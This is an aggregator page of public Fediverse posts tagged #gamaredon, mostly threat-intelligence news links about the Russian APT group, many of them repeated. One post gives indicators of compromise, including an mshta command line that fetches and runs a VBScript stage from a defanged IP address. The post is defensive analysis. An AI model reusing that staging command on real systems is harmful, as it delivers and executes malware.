#gamaredon — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #gamaredon, aggregated by home.social.
-
Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088
#CVE_2025_8088 #RomComGroup #APT44 #TEMP.Armageddon #Gamaredon #Turla #zeroplayer
https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability -
Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088
#CVE_2025_8088 #RomComGroup #APT44 #TEMP.Armageddon #Gamaredon #Turla #zeroplayer
https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability -
Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088
#CVE_2025_8088 #RomComGroup #APT44 #TEMP.Armageddon #Gamaredon #Turla #zeroplayer
https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability -
Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088
#CVE_2025_8088 #RomComGroup #APT44 #TEMP.Armageddon #Gamaredon #Turla #zeroplayer
https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability -
Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088
#CVE_2025_8088 #RomComGroup #APT44 #TEMP.Armageddon #Gamaredon #Turla #zeroplayer
https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability -
Gamaredon: Now Downloading via Windows Updates Best Friend “BITS”
#Gamaredon
https://blog.synapticsystems.de/gamaredon-now-downloading-via-windows-updates-best-friend/ -
Two of the world’s most prolific state-linked #cybercrime groups — #russia’s #Gamaredon and #NKorea’s #Lazarus collective — have been spotted sharing resources.
Experts found overlapping #tactics and shared #infrastructure between the two groups.
https://www.politico.eu/article/russia-north-korea-partner-cyber-crime-research-gamaredon-lazarus/
-
Two of the Kremlin’s most active hack groups are collaborating, ESET says - Two of the Kremlin’s most active hacking units recently were... - https://arstechnica.com/security/2025/09/two-of-the-kremlins-most-active-hack-groups-are-collaborating-eset-says/ #advancedpersistentthreat #gamaredon #security #biz #russia #turla #apt
-
Two of the Kremlin’s most active hack groups are collaborating, ESET says - Two of the Kremlin’s most active hacking units recently were... - https://arstechnica.com/security/2025/09/two-of-the-kremlins-most-active-hack-groups-are-collaborating-eset-says/ #advancedpersistentthreat #gamaredon #security #biz #russia #turla #apt
-
Two of the Kremlin’s most active hack groups are collaborating, ESET says - Two of the Kremlin’s most active hacking units recently were... - https://arstechnica.com/security/2025/09/two-of-the-kremlins-most-active-hack-groups-are-collaborating-eset-says/ #advancedpersistentthreat #gamaredon #security #biz #russia #turla #apt
-
Two of the Kremlin’s most active hack groups are collaborating, ESET says - Two of the Kremlin’s most active hacking units recently were... - https://arstechnica.com/security/2025/09/two-of-the-kremlins-most-active-hack-groups-are-collaborating-eset-says/ #advancedpersistentthreat #gamaredon #security #biz #russia #turla #apt
-
Two of the Kremlin’s most active hack groups are collaborating, ESET says - Two of the Kremlin’s most active hacking units recently were... - https://arstechnica.com/security/2025/09/two-of-the-kremlins-most-active-hack-groups-are-collaborating-eset-says/ #advancedpersistentthreat #gamaredon #security #biz #russia #turla #apt
-
Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions https://www.securityweek.com/turla-and-gamaredon-working-together-in-fresh-ukrainian-intrusions/ #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla
-
Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions https://www.securityweek.com/turla-and-gamaredon-working-together-in-fresh-ukrainian-intrusions/ #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla
-
Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions https://www.securityweek.com/turla-and-gamaredon-working-together-in-fresh-ukrainian-intrusions/ #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla
-
Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions https://www.securityweek.com/turla-and-gamaredon-working-together-in-fresh-ukrainian-intrusions/ #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla
-
Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions https://www.securityweek.com/turla-and-gamaredon-working-together-in-fresh-ukrainian-intrusions/ #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla
-
Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions https://www.securityweek.com/turla-and-gamaredon-working-together-in-fresh-ukrainian-intrusions/ #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla
-
Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions https://www.securityweek.com/turla-and-gamaredon-working-together-in-fresh-ukrainian-intrusions/ #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla
-
Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions https://www.securityweek.com/turla-and-gamaredon-working-together-in-fresh-ukrainian-intrusions/ #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla
-
#Gamaredon : The Turncoat #Spies Relentlessly #Hacking #Ukraine
For the past decade, this group of #FSB #hackers—including “traitor” #Ukrainian intelligence officers—has used a grinding barrage of #intrusion campaigns to make life hell for their former countrymen and #cybersecurity defenders.
#security #privacyhttps://www.wired.com/story/gamaredon-turncoat-spies-hacking-ukraine/
-
Gamaredon targeted the military mission of a Western country based in Ukraine – Source: securityaffairs.com https://ciso2ciso.com/gamaredon-targeted-the-military-mission-of-a-western-country-based-in-ukraine-source-securityaffairs-com/ #rssfeedpostgeneratorecho #informationsecuritynews #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #BreakingNews #Cyberwarfare #Intelligence #SecurityNews #hackingnews #Gamaredon #hacking #ukraine #Russia #APT
-
Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine – Source:thehackernews.com https://ciso2ciso.com/gamaredon-uses-infected-removable-drives-to-breach-western-military-mission-in-ukraine-sourcethehackernews-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #TheHackerNews #Gamaredon
-
State-Sponsored Tactics: How Gamaredon and ShadowPad Operate and Rotate Their Infrastructure
#Gamaredon #RedFoxtrot #ShadowPad
https://hunt.io/blog/state-sponsored-activity-gamaredon-shadowpad -
State-Sponsored Tactics: How Gamaredon and ShadowPad Operate and Rotate Their Infrastructure
#Gamaredon #RedFoxtrot #ShadowPad
https://hunt.io/blog/state-sponsored-activity-gamaredon-shadowpad -
State-Sponsored Tactics: How Gamaredon and ShadowPad Operate and Rotate Their Infrastructure
#Gamaredon #RedFoxtrot #ShadowPad
https://hunt.io/blog/state-sponsored-activity-gamaredon-shadowpad -
State-Sponsored Tactics: How Gamaredon and ShadowPad Operate and Rotate Their Infrastructure
#Gamaredon #RedFoxtrot #ShadowPad
https://hunt.io/blog/state-sponsored-activity-gamaredon-shadowpad -
The russia-backed #Gamaredon group targets Ukraine once again in the ongoing campaign that employs DLL sideloading and exploits LNK files to spread #Remcos backdoor. Detect related #APT attacks with #Sigma rules from SOC Prime Platform.
https://socprime.com/blog/gamaredon-campaign-detection/?utm_source=x&utm_medium=social&utm_campaign=latest-threats&utm_content=blog-post -
Gamaredon Campaign Detection: russia-backed APT Group Targets Ukraine Using LNK Files to Spread Remcos Backdoor – Source: socprime.com https://ciso2ciso.com/gamaredon-campaign-detection-russia-backed-apt-group-targets-ukraine-using-lnk-files-to-spread-remcos-backdoor-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #Latestthreats #socprimecom #Gamaredon #Phishing #socprime #Remcos #Blog #APT
-
Russia-linked Gamaredon targets Ukraine with Remcos RAT – Source: securityaffairs.com https://ciso2ciso.com/russia-linked-gamaredon-targets-ukraine-with-remcos-rat-source-securityaffairs-com/ #rssfeedpostgeneratorecho #informationsecuritynews #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #BreakingNews #Cyberwarfare #SecurityNews #hackingnews #Cybercrime #Gamaredon #RemcosRAT #hacking #Malware #ukraine #Russia
-
Gamaredon campaign abuses LNK files to distribute Remcos backdoor
#Gamaredon #Remcos
https://blog.talosintelligence.com/gamaredon-campaign-distribute-remcos/ -
GamaCopy targets Russia mimicking Russia-linked Gamaredon APT – Source: securityaffairs.com https://ciso2ciso.com/gamacopy-targets-russia-mimicking-russia-linked-gamaredon-apt-source-securityaffairs-com/ #rssfeedpostgeneratorecho #informationsecuritynews #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #BreakingNews #SecurityNews #GamaCopyAPT #hackingnews #Gamaredon #hacking #Malware #APT
-
Flash drive sharing #malware escapes Україна. #Gamaredon fingered as perps.
A worm spread by sharing #USB drives is breaking free, outside of its primary target. An #APT group tied to the Russian #FSB is said to be responsible—apparently it’s part of #Putin’s #cyberwar against #Ukraine.
#LitterDrifter is at least easily detected and blocked. In today’s #SBBlogwatch, we give thanks for small mercies. At @TechstrongGroup’s @SecurityBlvd: https://securityboulevard.com/2023/11/litterdrifter-russian-usb-worm-richixbw/?utm_source=richisoc&utm_medium=social&utm_content=richisoc&utm_campaign=richisoc
-
Flash drive sharing #malware escapes Україна. #Gamaredon fingered as perps.
A worm spread by sharing #USB drives is breaking free, outside of its primary target. An #APT group tied to the Russian #FSB is said to be responsible—apparently it’s part of #Putin’s #cyberwar against #Ukraine.
#LitterDrifter is at least easily detected and blocked. In today’s #SBBlogwatch, we give thanks for small mercies. At @TechstrongGroup’s @SecurityBlvd: https://securityboulevard.com/2023/11/litterdrifter-russian-usb-worm-richixbw/?utm_source=richisoc&utm_medium=social&utm_content=richisoc&utm_campaign=richisoc
-
Flash drive sharing #malware escapes Україна. #Gamaredon fingered as perps.
A worm spread by sharing #USB drives is breaking free, outside of its primary target. An #APT group tied to the Russian #FSB is said to be responsible—apparently it’s part of #Putin’s #cyberwar against #Ukraine.
#LitterDrifter is at least easily detected and blocked. In today’s #SBBlogwatch, we give thanks for small mercies. At @TechstrongGroup’s @SecurityBlvd: https://securityboulevard.com/2023/11/litterdrifter-russian-usb-worm-richixbw/?utm_source=richisoc&utm_medium=social&utm_content=richisoc&utm_campaign=richisoc
-
Flash drive sharing #malware escapes Україна. #Gamaredon fingered as perps.
A worm spread by sharing #USB drives is breaking free, outside of its primary target. An #APT group tied to the Russian #FSB is said to be responsible—apparently it’s part of #Putin’s #cyberwar against #Ukraine.
#LitterDrifter is at least easily detected and blocked. In today’s #SBBlogwatch, we give thanks for small mercies. At @TechstrongGroup’s @SecurityBlvd: https://securityboulevard.com/2023/11/litterdrifter-russian-usb-worm-richixbw/?utm_source=richisoc&utm_medium=social&utm_content=richisoc&utm_campaign=richisoc
-
Flash drive sharing #malware escapes Україна. #Gamaredon fingered as perps.
A worm spread by sharing #USB drives is breaking free, outside of its primary target. An #APT group tied to the Russian #FSB is said to be responsible—apparently it’s part of #Putin’s #cyberwar against #Ukraine.
#LitterDrifter is at least easily detected and blocked. In today’s #SBBlogwatch, we give thanks for small mercies. At @TechstrongGroup’s @SecurityBlvd: https://securityboulevard.com/2023/11/litterdrifter-russian-usb-worm-richixbw/?utm_source=richisoc&utm_medium=social&utm_content=richisoc&utm_campaign=richisoc
-
Russian APT Gamaredon uses USB worm LitterDrifter against Ukraine – Source: securityaffairs.com https://ciso2ciso.com/russian-apt-gamaredon-uses-usb-worm-litterdrifter-against-ukraine-source-securityaffairs-com/ #rssfeedpostgeneratorecho #informationsecuritynews #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #LitterDrifter #BreakingNews #Intelligence #SecurityNews #hackingnews #Gamaredon #hacking #Malware #ukraine #Russia #worm
-
Russian APT Gamaredon uses USB worm LitterDrifter against Ukraine – Source: securityaffairs.com https://ciso2ciso.com/russian-apt-gamaredon-uses-usb-worm-litterdrifter-against-ukraine-source-securityaffairs-com/ #rssfeedpostgeneratorecho #informationsecuritynews #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #LitterDrifter #BreakingNews #Intelligence #SecurityNews #hackingnews #Gamaredon #hacking #Malware #ukraine #Russia #worm
-
A very fresh #Gamaredon TA sample from today (Jan 23, 2022) targeting the Directorate General For Rendering Services To Diplomatic Missions of #Ukraine:
Original email: afb612d08112c036628a29ed8d4bd4550ca7cfed2582e2f432f2283a9b507f15
Attachment:
d124919de870b5974639ba24dd80709ed890119bdec4ba6a6179464fca4ef952 *Запит.tarExtracted malicious LNK:
600ef7861ad03b434d98312a4133dc33fa1944f43c2e558044dfcdb342803147 *Відповідно_до_статті_20_Закону,_просимо_надати_відповідь_протягом_5_робочих_днів_з_дня_отримання_запиту.lnk
dropping a next stage #vbscript via #mshta%windir%\system32\mshta[.]exe http://194.180.174[.]203/23.01/mo/baseball[.]DjVu
284bd873c840415ee24738f0a866b558d51f5f58b6bf29fb2818ffb819f9bd04 *baseball.DjVu
Once deobfuscated it leads to a #Telegram channel providing with the next state IP:
b7422446c22baee16c6c9c00a82610f739b836648ffce070bbd6c932db5416f5 *baseball.DjVu.deobfuscatedWe have a full paper of this Telegram multi-staging technique published last week here: https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations
-
📬 Ukraine warnt vor Cyber-Angriffen auf den Telegram-Messenger
#Hacking #Armageddon #Gamaredon #Phishing #Telegram #Ukraine #UkraineCyberPolice https://tarnkappe.info/artikel/hacking/ukraine-warnt-vor-cyber-angriffen-auf-den-telegram-messenger-219440.html -
СНБО считает что спецслужбы России готовят атаку на Украину #хакер, #Украина, #Россия, #спецслужбы, #Gamaredon, #InvisiMole https://www.securitylab.ru/news/511326.php https://twitter.com/SecurityLabnews/status/1296220490999173122/photo/1